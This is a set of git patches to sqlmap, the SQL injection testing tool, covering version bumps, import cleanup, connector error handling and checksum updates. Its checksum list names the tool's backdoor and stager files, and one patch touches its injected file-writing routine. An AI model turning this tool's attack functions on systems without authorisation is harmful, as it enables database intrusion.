100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.5" +VERSION = "1.2.10.6" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/thirdparty/ansistrm/ansistrm.py b/thirdparty/ansistrm/ansistrm.py index a2af36e2b64..81bd880c385 100644 --- a/thirdparty/ansistrm/ansistrm.py +++ b/thirdparty/ansistrm/ansistrm.py @@ -181,8 +181,10 @@ def colorize(self, message, levelno): if level != "PAYLOAD": if any(_ in message for _ in ("parsed DBMS error message",)): - string = re.search(r": '(.+)'", message).group(1) - message = message.replace("'%s'" % string, "'%s'" % ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, self._reset(message))), 1) + match = re.search(r": '(.+)'", message) + if match: + string = match.group(1) + message = message.replace("'%s'" % string, "'%s'" % ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, self._reset(message))), 1) else: for match in re.finditer(r"[^\w]'([^']+)'", message): # single-quoted string = match.group(1) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 7d88c2debad..5164c2219e1 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -af9f01fd0d42d37f40e41f93907e2528 lib/core/settings.py +5192b4916a979e3fb249b72e3a89b3a6 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py @@ -284,7 +284,7 @@ f2b9eac52d346315f5705f71beeda791 tamper/varnish.py 0e40966a51d1eb5d42a2159d2015a8a4 tamper/versionedkeywords.py 0fba004bf1be6edbefbda89f23f4e518 tamper/versionedmorekeywords.py d8279aa1633e2485ed751eb0361d1c8e tamper/xforwardedfor.py -1ebf563bb2cb18b68ea952418bba0ec5 thirdparty/ansistrm/ansistrm.py +b1c02296b4e3b0ebaa58b9dcd914cbf4 thirdparty/ansistrm/ansistrm.py d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py 8e775c25bc9e84891ad6fcb4f0005c23 thirdparty/beautifulsoup/beautifulsoup.py cb2e1fe7c404dff41a2ae9132828f532 thirdparty/beautifulsoup/__init__.py From fd89fdf40b9100d2018516d00f22f73fd1403b31 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 3 Oct 2018 11:27:51 +0200 Subject: [PATCH 312/428] Minor cleaning up --- lib/core/common.py | 3 +-- lib/core/settings.py | 2 +- plugins/dbms/maxdb/enumeration.py | 1 - plugins/dbms/mysql/filesystem.py | 2 +- plugins/dbms/sybase/enumeration.py | 1 - plugins/generic/users.py | 1 - sqlmap.py | 6 +++--- txt/checksum.md5 | 14 +++++++------- 8 files changed, 13 insertions(+), 17 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 98ba41adfff..75d2eca2fed 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -165,7 +165,6 @@ from lib.core.settings import URLENCODE_CHAR_LIMIT from lib.core.settings import URLENCODE_FAILSAFE_CHARS from lib.core.settings import USER_AGENT_ALIASES -from lib.core.settings import VERSION from lib.core.settings import VERSION_STRING from lib.core.settings import WEBSCARAB_SPLITTER from lib.core.threads import getCurrentThreadData @@ -3371,7 +3370,7 @@ def getLatestRevision(): """ Retrieves latest revision from the offical repository - >>> getLatestRevision() == VERSION + >>> from lib.core.settings import VERSION; getLatestRevision() == VERSION True """ diff --git a/lib/core/settings.py b/lib/core/settings.py index 68aa89b571c..e352d40f3ef 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.6" +VERSION = "1.2.10.7" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/dbms/maxdb/enumeration.py b/plugins/dbms/maxdb/enumeration.py index da2a502c115..b61946912cb 100644 --- a/plugins/dbms/maxdb/enumeration.py +++ b/plugins/dbms/maxdb/enumeration.py @@ -5,7 +5,6 @@ See the file 'LICENSE' for copying permission """ -from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import safeSQLIdentificatorNaming from lib.core.common import unsafeSQLIdentificatorNaming diff --git a/plugins/dbms/mysql/filesystem.py b/plugins/dbms/mysql/filesystem.py index a81c9d1b65a..1ddc716c7ad 100644 --- a/plugins/dbms/mysql/filesystem.py +++ b/plugins/dbms/mysql/filesystem.py @@ -136,7 +136,7 @@ def linesTerminatedWriteFile(self, wFile, dFile, fileType, forceCheck=False): query = getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=dFile, HEXSTRING=fcEncodedStr) query = agent.prefixQuery(query) # Note: No need for suffix as 'write_file_limit' already ends with comment (required) payload = agent.payload(newValue=query) - page = Request.queryPage(payload) + Request.queryPage(payload, content=False, raise404=False, silent=True, noteResponseTime=False) warnMsg = "expect junk characters inside the " warnMsg += "file as a leftover from original query" diff --git a/plugins/dbms/sybase/enumeration.py b/plugins/dbms/sybase/enumeration.py index f7d5b0970b7..97263bc7194 100644 --- a/plugins/dbms/sybase/enumeration.py +++ b/plugins/dbms/sybase/enumeration.py @@ -7,7 +7,6 @@ from lib.core.common import filterPairValues from lib.core.common import isTechniqueAvailable -from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import safeSQLIdentificatorNaming from lib.core.common import unArrayizeValue diff --git a/plugins/generic/users.py b/plugins/generic/users.py index 9ff861908bb..e2cec9763ca 100644 --- a/plugins/generic/users.py +++ b/plugins/generic/users.py @@ -19,7 +19,6 @@ from lib.core.common import isNumPosStrValue from lib.core.common import isTechniqueAvailable from lib.core.common import parsePasswordHash -from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import unArrayizeValue from lib.core.convert import hexencode diff --git a/sqlmap.py b/sqlmap.py index 31410a11fd8..6488066b4eb 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -69,11 +69,11 @@ errMsg = "user aborted" if "logger" in globals(): - logger.error(errMsg) + logger.critical(errMsg) raise SystemExit else: import time - exit("\r[%s] [ERROR] %s" % (time.strftime("%X"), errMsg)) + exit("\r[%s] [CRITICAL] %s" % (time.strftime("%X"), errMsg)) def modulePath(): """ @@ -196,7 +196,7 @@ def main(): errMsg = "user aborted" try: - logger.error(errMsg) + logger.critical(errMsg) except KeyboardInterrupt: pass diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 5164c2219e1..a52e4944714 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -29,7 +29,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 8eb0a5dbd79bd58fedac4c0cc344246b lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py -cbf9428039f52d8ee80fcf79b6583b7c lib/core/common.py +2f47247892e5d558bbbe97c6cec7121f lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -5192b4916a979e3fb249b72e3a89b3a6 lib/core/settings.py +16e697be36101880289e6095a0978a4b lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py @@ -156,7 +156,7 @@ aa77fec4fe6b2d7ca4a91aebd9ff4e21 plugins/dbms/informix/syntax.py 25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/informix/takeover.py 1e5532ede194ac9c083891c2f02bca93 plugins/dbms/__init__.py 6917f9b045f6188b89e816dea9b46a3f plugins/dbms/maxdb/connector.py -53d1bf931baa6b76198ece861e2318a3 plugins/dbms/maxdb/enumeration.py +1f3f9d4c7ec62452ed2465cd9cf50aa1 plugins/dbms/maxdb/enumeration.py ffd26f64142226d0b1ed1d70f7f294c0 plugins/dbms/maxdb/filesystem.py 9f9f1c4c4c3150545c4b61d1cffc76a8 plugins/dbms/maxdb/fingerprint.py 4321d7018f5121343460ebfd83bb69be plugins/dbms/maxdb/__init__.py @@ -171,7 +171,7 @@ f25c50a95e5390ecd32be5a011637349 plugins/dbms/mssqlserver/__init__.py 3c0845fa526e1bb7bbe636fcfcbcc4a6 plugins/dbms/mssqlserver/takeover.py 11a5724fdc0b0c0eb2626d952cda216a plugins/dbms/mysql/connector.py 445164daf59b890aeacc968af58fcb53 plugins/dbms/mysql/enumeration.py -34216d44fe66ffc8c5b4a0714839cf9f plugins/dbms/mysql/filesystem.py +edec54520556a5eb66900fca697940ff plugins/dbms/mysql/filesystem.py 1c0175476b833a1b788550726be67c99 plugins/dbms/mysql/fingerprint.py 30065993f8300994e4658634121609e9 plugins/dbms/mysql/__init__.py 0e2adbee217f5b94dcc124d24b8dde99 plugins/dbms/mysql/syntax.py @@ -198,7 +198,7 @@ f639120d42b33b6ca67930bddbf2ac1f plugins/dbms/sqlite/__init__.py 964e59d2eba619b068b0a15cea28efe0 plugins/dbms/sqlite/syntax.py 3364b2938d7040c507cd622c323557dc plugins/dbms/sqlite/takeover.py 9e64e67291a4c369bad8b8cf2cfa722a plugins/dbms/sybase/connector.py -b856f677371a59d4a01b72bacac88032 plugins/dbms/sybase/enumeration.py +4fe9ee0dfa50e9c46e6512128471cbee plugins/dbms/sybase/enumeration.py 74de450dd6d6d006aa9c7eed56e6b09a plugins/dbms/sybase/filesystem.py 0329ab09187614bea02398def59695ec plugins/dbms/sybase/fingerprint.py a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py @@ -216,7 +216,7 @@ f7874230e5661910d5fd21544c7d1022 plugins/generic/misc.py b1d2a7f3170f9b69e71335aa47f9b08b plugins/generic/search.py a70cc0ada4b0cc9e7df23cb6d48a4a0c plugins/generic/syntax.py a37c21cc3fa5c0c220d33d450bf503ed plugins/generic/takeover.py -4db140069923afbae38fd93e37c00248 plugins/generic/users.py +e762c77ff79e4c138145501f6fbb10cb plugins/generic/users.py 1e5532ede194ac9c083891c2f02bca93 plugins/__init__.py 5dc693e22f5d020c5c568d7325bd4226 shell/backdoors/backdoor.asp_ 158bfa168128393dde8d6ed11fe9a1b8 shell/backdoors/backdoor.aspx_ @@ -227,7 +227,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ cd90da0474d7b1a67d7b40d208493375 sqlmapapi.py -5f30815ebe320e46e5898dc819e629a7 sqlmap.py +c66cb57ef2d927d5e22a84413121b9ef sqlmap.py 523dab9e1093eb59264c6beb366b255a tamper/0x2char.py 3a1697585ae4e7bf315e9dda97d6f321 tamper/apostrophemask.py d7a119a74be9b385ee3884fb5e6af041 tamper/apostrophenullencode.py From 36b660309b65b67909e766d797df184134147c53 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 3 Oct 2018 12:28:55 +0200 Subject: [PATCH 313/428] Minor patch --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- sqlmap.py | 1 + thirdparty/termcolor/termcolor.py | 2 ++ txt/checksum.md5 | 8 ++++---- 5 files changed, 9 insertions(+), 6 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 75d2eca2fed..6bf632b6b43 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1198,7 +1198,7 @@ def banner(): This function prints sqlmap banner with its version """ - if not any(_ in sys.argv for _ in ("--version", "--api")): + if not any(_ in sys.argv for _ in ("--version", "--api")) and not conf.get("disableBanner"): _ = BANNER if not getattr(LOGGER_HANDLER, "is_tty", False) or "--disable-coloring" in sys.argv: diff --git a/lib/core/settings.py b/lib/core/settings.py index e352d40f3ef..ee3be4af375 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.7" +VERSION = "1.2.10.8" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/sqlmap.py b/sqlmap.py index 6488066b4eb..7085f59edd8 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -388,6 +388,7 @@ def main(): cmdLineOptions.clear() conf.clear() kb.clear() + conf.disableBanner = True main() if conf.get("api"): diff --git a/thirdparty/termcolor/termcolor.py b/thirdparty/termcolor/termcolor.py index f11b824b287..bac57f28a97 100644 --- a/thirdparty/termcolor/termcolor.py +++ b/thirdparty/termcolor/termcolor.py @@ -79,6 +79,8 @@ )) ) +COLORS.update(dict(("light%s" % color, COLORS[color] + 60) for color in COLORS)) + RESET = '\033[0m' diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a52e4944714..ee8356ce4b6 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -29,7 +29,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 8eb0a5dbd79bd58fedac4c0cc344246b lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py -2f47247892e5d558bbbe97c6cec7121f lib/core/common.py +6d8bda015437de6439ad93a83fa92410 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -16e697be36101880289e6095a0978a4b lib/core/settings.py +68c0986d21fbc5f154c02869e371cb7e lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py @@ -227,7 +227,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ cd90da0474d7b1a67d7b40d208493375 sqlmapapi.py -c66cb57ef2d927d5e22a84413121b9ef sqlmap.py +c6f90d321b9ec7bff5b3be15cd4e19d8 sqlmap.py 523dab9e1093eb59264c6beb366b255a tamper/0x2char.py 3a1697585ae4e7bf315e9dda97d6f321 tamper/apostrophemask.py d7a119a74be9b385ee3884fb5e6af041 tamper/apostrophenullencode.py @@ -359,7 +359,7 @@ a7f735641c5b695f3d6220fe7c91b030 thirdparty/pydes/pyDes.py d41d8cd98f00b204e9800998ecf8427e thirdparty/socks/__init__.py afd97f26bffa0532ee4eb4f5f8ec1ab7 thirdparty/socks/socks.py d41d8cd98f00b204e9800998ecf8427e thirdparty/termcolor/__init__.py -ea649aae139d8551af513769dd913dbf thirdparty/termcolor/termcolor.py +d97198005a387a9d23916c616620ef7f thirdparty/termcolor/termcolor.py bf55909ad163b58236e44b86e8441b26 thirdparty/wininetpton/__init__.py a44e7cf30f2189b2fbdb635b310cdc0c thirdparty/wininetpton/win_inet_pton.py 855372c870a23d46683f8aa39d75f6a1 thirdparty/xdot/__init__.py From eba01ee74ec60e84ae75417abe962db9adeba771 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 3 Oct 2018 12:46:40 +0200 Subject: [PATCH 314/428] Just in case patch (for --api) --- lib/core/common.py | 4 ++-- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 6bf632b6b43..c4c676b60a2 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -899,7 +899,7 @@ def clearColors(message): retVal = message - if message: + if isinstance(message, str): retVal = re.sub(r"\x1b\[[\d;]+m", "", message) return retVal @@ -923,7 +923,7 @@ def dataToStdout(data, forceOutput=False, bold=False, content_type=None, status= try: if conf.get("api"): - sys.stdout.write(message, status, content_type) + sys.stdout.write(clearColors(message), status, content_type) else: sys.stdout.write(setColor(message, bold=bold)) diff --git a/lib/core/settings.py b/lib/core/settings.py index ee3be4af375..6958c78299a 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.8" +VERSION = "1.2.10.9" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index ee8356ce4b6..1667246c9de 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -29,7 +29,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 8eb0a5dbd79bd58fedac4c0cc344246b lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py -6d8bda015437de6439ad93a83fa92410 lib/core/common.py +c2b12f7e29e9b2d9290c2a8a0a317499 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -68c0986d21fbc5f154c02869e371cb7e lib/core/settings.py +88fff14c74e98f54caafe8ef5f865ee6 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py From 3984b9429726f8c6e1b5a6968f3679c2ccdbacfb Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 4 Oct 2018 13:42:13 +0200 Subject: [PATCH 315/428] Fixes #3271 --- lib/core/common.py | 2 ++ lib/core/settings.py | 2 +- plugins/dbms/access/connector.py | 9 +++++---- plugins/dbms/db2/connector.py | 7 ++++--- plugins/dbms/firebird/connector.py | 9 +++++---- plugins/dbms/informix/connector.py | 9 +++++---- plugins/dbms/mysql/connector.py | 13 ++++++------- txt/checksum.md5 | 14 +++++++------- 8 files changed, 35 insertions(+), 30 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index c4c676b60a2..17574782212 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -4727,6 +4727,8 @@ def getSafeExString(ex, encoding=None): retVal = ex.message elif getattr(ex, "msg", None): retVal = ex.msg + elif isinstance(ex, (list, tuple)) and len(ex) > 1 and isinstance(ex[1], basestring): + retVal = ex[1] return getUnicode(retVal or "", encoding=encoding).strip() diff --git a/lib/core/settings.py b/lib/core/settings.py index 6958c78299a..d4c4f3d9f0a 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.9" +VERSION = "1.2.10.10" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/dbms/access/connector.py b/plugins/dbms/access/connector.py index 4e579c97f1c..13dc3c12471 100644 --- a/plugins/dbms/access/connector.py +++ b/plugins/dbms/access/connector.py @@ -12,6 +12,7 @@ import logging +from lib.core.common import getSafeExString from lib.core.data import conf from lib.core.data import logger from lib.core.exception import SqlmapConnectionException @@ -43,7 +44,7 @@ def connect(self): try: self.connector = pyodbc.connect('Driver={Microsoft Access Driver (*.mdb)};Dbq=%s;Uid=Admin;Pwd=;' % self.db) except (pyodbc.Error, pyodbc.OperationalError), msg: - raise SqlmapConnectionException(msg[1]) + raise SqlmapConnectionException(getSafeExString(msg)) self.initCursor() self.printConnected() @@ -52,16 +53,16 @@ def fetchall(self): try: return self.cursor.fetchall() except pyodbc.ProgrammingError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(msg)) return None def execute(self, query): try: self.cursor.execute(query) except (pyodbc.OperationalError, pyodbc.ProgrammingError), msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(msg)) except pyodbc.Error, msg: - raise SqlmapConnectionException(msg[1]) + raise SqlmapConnectionException(getSafeExString(msg)) self.connector.commit() diff --git a/plugins/dbms/db2/connector.py b/plugins/dbms/db2/connector.py index dcb2b5fca5b..73f7ebba47b 100644 --- a/plugins/dbms/db2/connector.py +++ b/plugins/dbms/db2/connector.py @@ -12,6 +12,7 @@ import logging +from lib.core.common import getSafeExString from lib.core.data import conf from lib.core.data import logger from lib.core.exception import SqlmapConnectionException @@ -44,16 +45,16 @@ def fetchall(self): try: return self.cursor.fetchall() except ibm_db_dbi.ProgrammingError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(msg)) return None def execute(self, query): try: self.cursor.execute(query) except (ibm_db_dbi.OperationalError, ibm_db_dbi.ProgrammingError), msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(msg)) except ibm_db_dbi.InternalError, msg: - raise SqlmapConnectionException(msg[1]) + raise SqlmapConnectionException(getSafeExString(msg)) self.connector.commit() diff --git a/plugins/dbms/firebird/connector.py b/plugins/dbms/firebird/connector.py index f6b88cb0048..42e2ea925f1 100644 --- a/plugins/dbms/firebird/connector.py +++ b/plugins/dbms/firebird/connector.py @@ -12,6 +12,7 @@ import logging +from lib.core.common import getSafeExString from lib.core.data import conf from lib.core.data import logger from lib.core.exception import SqlmapConnectionException @@ -42,7 +43,7 @@ def connect(self): # Reference: http://www.daniweb.com/forums/thread248499.html self.connector = kinterbasdb.connect(host=self.hostname.encode(UNICODE_ENCODING), database=self.db.encode(UNICODE_ENCODING), user=self.user.encode(UNICODE_ENCODING), password=self.password.encode(UNICODE_ENCODING), charset="UTF8") except kinterbasdb.OperationalError, msg: - raise SqlmapConnectionException(msg[1]) + raise SqlmapConnectionException(getSafeExString(msg)) self.initCursor() self.printConnected() @@ -51,16 +52,16 @@ def fetchall(self): try: return self.cursor.fetchall() except kinterbasdb.OperationalError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(msg)) return None def execute(self, query): try: self.cursor.execute(query) except kinterbasdb.OperationalError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(msg)) except kinterbasdb.Error, msg: - raise SqlmapConnectionException(msg[1]) + raise SqlmapConnectionException(getSafeExString(msg)) self.connector.commit() diff --git a/plugins/dbms/informix/connector.py b/plugins/dbms/informix/connector.py index e85de013fc5..f97ec1a7390 100644 --- a/plugins/dbms/informix/connector.py +++ b/plugins/dbms/informix/connector.py @@ -12,6 +12,7 @@ import logging +from lib.core.common import getSafeExString from lib.core.data import conf from lib.core.data import logger from lib.core.exception import SqlmapConnectionException @@ -35,7 +36,7 @@ def connect(self): database = "DATABASE=%s;HOSTNAME=%s;PORT=%s;PROTOCOL=TCPIP;" % (self.db, self.hostname, self.port) self.connector = ibm_db_dbi.connect(database, self.user, self.password) except ibm_db_dbi.OperationalError, msg: - raise SqlmapConnectionException(msg) + raise SqlmapConnectionException(getSafeExString(msg)) self.initCursor() self.printConnected() @@ -44,16 +45,16 @@ def fetchall(self): try: return self.cursor.fetchall() except ibm_db_dbi.ProgrammingError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(msg)) return None def execute(self, query): try: self.cursor.execute(query) except (ibm_db_dbi.OperationalError, ibm_db_dbi.ProgrammingError), msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(msg)) except ibm_db_dbi.InternalError, msg: - raise SqlmapConnectionException(msg[1]) + raise SqlmapConnectionException(getSafeExString(msg)) self.connector.commit() diff --git a/plugins/dbms/mysql/connector.py b/plugins/dbms/mysql/connector.py index 7521b2bc2b7..184e2eaff18 100644 --- a/plugins/dbms/mysql/connector.py +++ b/plugins/dbms/mysql/connector.py @@ -13,6 +13,7 @@ import logging import struct +from lib.core.common import getSafeExString from lib.core.data import conf from lib.core.data import logger from lib.core.exception import SqlmapConnectionException @@ -37,10 +38,8 @@ def connect(self): try: self.connector = pymysql.connect(host=self.hostname, user=self.user, passwd=self.password, db=self.db, port=self.port, connect_timeout=conf.timeout, use_unicode=True) - except (pymysql.OperationalError, pymysql.InternalError, pymysql.ProgrammingError), msg: - raise SqlmapConnectionException(msg[1]) - except struct.error, msg: - raise SqlmapConnectionException(msg) + except (pymysql.OperationalError, pymysql.InternalError, pymysql.ProgrammingError, struct.error), msg: + raise SqlmapConnectionException(getSafeExString(msg)) self.initCursor() self.printConnected() @@ -49,7 +48,7 @@ def fetchall(self): try: return self.cursor.fetchall() except pymysql.ProgrammingError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(msg)) return None def execute(self, query): @@ -59,9 +58,9 @@ def execute(self, query): self.cursor.execute(query) retVal = True except (pymysql.OperationalError, pymysql.ProgrammingError), msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(msg)) except pymysql.InternalError, msg: - raise SqlmapConnectionException(msg[1]) + raise SqlmapConnectionException(getSafeExString(msg)) self.connector.commit() diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 1667246c9de..777e9baeded 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -29,7 +29,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 8eb0a5dbd79bd58fedac4c0cc344246b lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py -c2b12f7e29e9b2d9290c2a8a0a317499 lib/core/common.py +11448f59efbfdceff2437239e36d9dc5 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -88fff14c74e98f54caafe8ef5f865ee6 lib/core/settings.py +d6947d662df4d4bc9c33012a98a5fbc8 lib/core/settings.py 